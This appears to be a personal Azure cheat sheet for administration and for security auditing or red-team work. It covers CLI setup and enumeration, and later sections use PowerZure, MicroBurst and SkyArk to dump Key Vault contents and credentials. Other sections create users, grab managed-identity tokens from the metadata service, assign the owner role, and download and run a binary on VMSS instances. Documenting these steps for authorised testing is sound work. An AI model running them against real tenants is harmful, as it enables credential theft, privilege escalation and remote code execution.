Getting Started
Install latest version of Azure CLI on Mac
brew update && brew install azure-cli
Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos
Install latest version of Azure CLI on Linux
# YOLO
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
Resources: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0
Install PowerShell
brew install --cask powershell-preview
Run a powershell terminal with:
pwsh-preview
Update Powershell
brew update
brew upgrade powershell-preview --cask
Uninstall Powershell
brew uninstall --cask powershell
sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell
Install Azure PowerShell module
For the current user:
if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) {
Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' +
'Az modules installed at the same time is not supported.')
} else {
Install-Module -Name Az -AllowClobber -Scope CurrentUser
}
Resource: https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0
Setup the AzureRMAlias module
This will deal with incompatibilities with older scripts that use AzureRM:
Enable-AzureRmAlias
List available modules
Get-Module -ListAvailable
Get authenticated in Powershell
Connect-AzAccount
List commands in a module
Get-Command -Module <module name>
List functions in a module
Get-Command -Module <module name> -Type Function
Resource: https://stackoverflow.com/questions/6354317/how-do-i-retrieve-the-available-commands-from-a-module
Authenticate via the CLI
Run this command to get authenticated:
az login
This will result in a web browser opening, or a URL prompt. Navigating to this url will prompt you for a code, which you’ve been provided in the command line. Paste it in, click next, and select the proper account.
Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos
Info Gathering
List subscriptions for authenticated account
az account list
Get tenant id
az account list | jq '.[].tenantId'
Get subscription id
az cli:
az account list | jq '.[].id'
Powershell:
Get-AzSubscription
Resources:
List tenants
az account tenant list
List Resource Groups by name
az group list | jq -r '.[].name'
Resource: https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest
Set Subscription
az cli:
az account set -s <name or id>
Powershell:
Set-AzureSubscription -Id [Subscription ID]
Resources:
- https://powerzure.readthedocs.io/en/latest/Requirements/requirements.html
- https://stackoverflow.com/questions/38475104/azure-cli-how-to-change-subscription-default
List all VMs
az vm list
Resource: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
Blob Storage
List all storage accounts and output in a table format:
az storage account list -o table
List all storage accounts and get storage account names:
az storage account list -o json | jq -r '.[].name'
You can assign one of the account names to an env var if you’d like:
export AZURE_STORAGE_ACCOUNT=<storage account name from output>
Get storage keys
If you set the env var:
az storage account keys list -n $AZURE_STORAGE_ACCOUNT
You can assign one of the keys to an env var if you’d like:
export AZURE_STORAGE_KEY='<your key from the output of the previous command>'
List storage containers
az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY"
List storage container contents
az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY
List blob names
az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name'
Azure Kubernetes (k8s)
Get available versions of k8s in a region
REGION=westus2 # This will vary depending on the region you're using
az aks get-versions --location $REGION -o table
Resource: https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet
List managed k8s clusters
az aks list
Resource: https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest
Get Resource Group Name for clusters
AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup')
Get Cluster Name
AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name')
Configure kubectl
This is pretty awesome, good job Microsoft:
az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME
Resources:
- https://www.reddit.com/r/kubernetes/comments/8ohxcz/how_to_connect_kubectl_to_aks/
- https://docs.microsoft.com/en-us/azure/aks/tutorial-kubernetes-deploy-cluster
Security Auditing
ScoutSuite
https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.
Install:
git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt
Run:
python scout.py azure --cli
Resources: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/
PowerZure
git clone git@github.com:hausec/PowerZure.git
cd PowerZure
pwsh-preview
# Authenticate
Connect-AzAccount
# Import PowerZure
# impo is shorthand for Import-Module
ipmo ./PowerZure.ps1
# If you have multiple subscriptions, set the one you want to target:
Set-AzureSubscription -Id [Subscription ID]
# Enumerate all roles
Get-AzureRole
# Enumerate resources the current user has access to
Get-AzureTargets
# Show info about current user
Show-AzureCurrentUser
Resources:
- https://powerzure.readthedocs.io/en/latest/
- Fix error when importing AzureADPreview
- Fix missing modules
Show all functions
powerzure -h
Get help for a particular function
For example:
get-help Get-AzureTargets
Get all content from all KeyVaults
Show-AzureKeyVaultContent -All
Resource:
Create a new user
New-AzureUser -Username 'test@test.com' -Password reallyAwesomePassword123!
MicroBurst
git clone git@github.com:NetSPI/MicroBurst.git
cd MicroBurst
pwsh-preview
# Authenticate
Connect-AzAccount
# Import MicroBurst
ipmo ./MicroBurst.psm1
# Install module for Out-GridView
Install-Module Microsoft.PowerShell.GraphicalTools
# Show commands
Get-Command -Module MicroBurst
# Dump info from an Azure subscription
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzDomainInfo -folder MicroBurst -Verbose
# Look for creds or certificate stores in a number of places and dump them to `secrets.txt`
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt
# Dump Key Vault Keys and Secrets from an Azure subscription
# via Automation Accounts specifically
**Note:** Be sure to click a row in the pop up before clicking **Export**
Get-AzKeyVaultsAutomation -Verbose
Resources:
SkyArk
git clone https://github.com/cyberark/SkyArk
cd SkyArk
pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AzureStealth
Azure AD
List all applications
az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'
List all service principles
az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'
List all groups
az ad group list --output=json --query='[].{Group:displayName,Description:description}'
Resource: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
VMSS
View all VMSS in a subscription
Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat!
CLI
az vmss list
Get VMSS by name and associated resource group
az vmss list | jq '.[].name, .[].resourceGroup'
List vms in a VMSS
az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP
Resource: https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest https://github.com/andyt530/az2tf/blob/master/scripts/295_azurerm_virtual_machine_scale_set.sh
Get computer name of vms in a VMSS
az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName'
Run command in VM in a VMSS
This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with.
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $1' --parameters hello world
Run whoami:
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami'
Run download and run a binary as a background job:
az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget https://example.com/binary && chmod +x binary && ./binary &"'
Resources:
- https://docs.microsoft.com/en-us/powershell/module/az.compute/add-azvmsshpublickey?view=azps-5.5.0
- Run command on a VMSS instance
Metadata Service
Get all instance metadata
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01"
Get access token
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com"
Resources:
Request storage account token
# Get OAuth Token
TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -H Metadata:true | jq -r '.access_token')
# Get subscription id
SUB=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" | jq -r '.compute.subscriptionId')
# Get list of storage accounts
curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01"
Resource:
Get AKS node IP
curl -s -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2017-08-01" | jq -r .network.interface[].ipv4.ipAddress[].privateIpAddress
Roles
Create new role assignment
This will try to assign the assignee the owner role:
az role assignment create --assignee <user or service principal> --role "owner"
Resource: https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/
Features
Show registered features in a table format
az feature list -o table
Find features associated w/ ContainerService
az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}"
Resource: https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/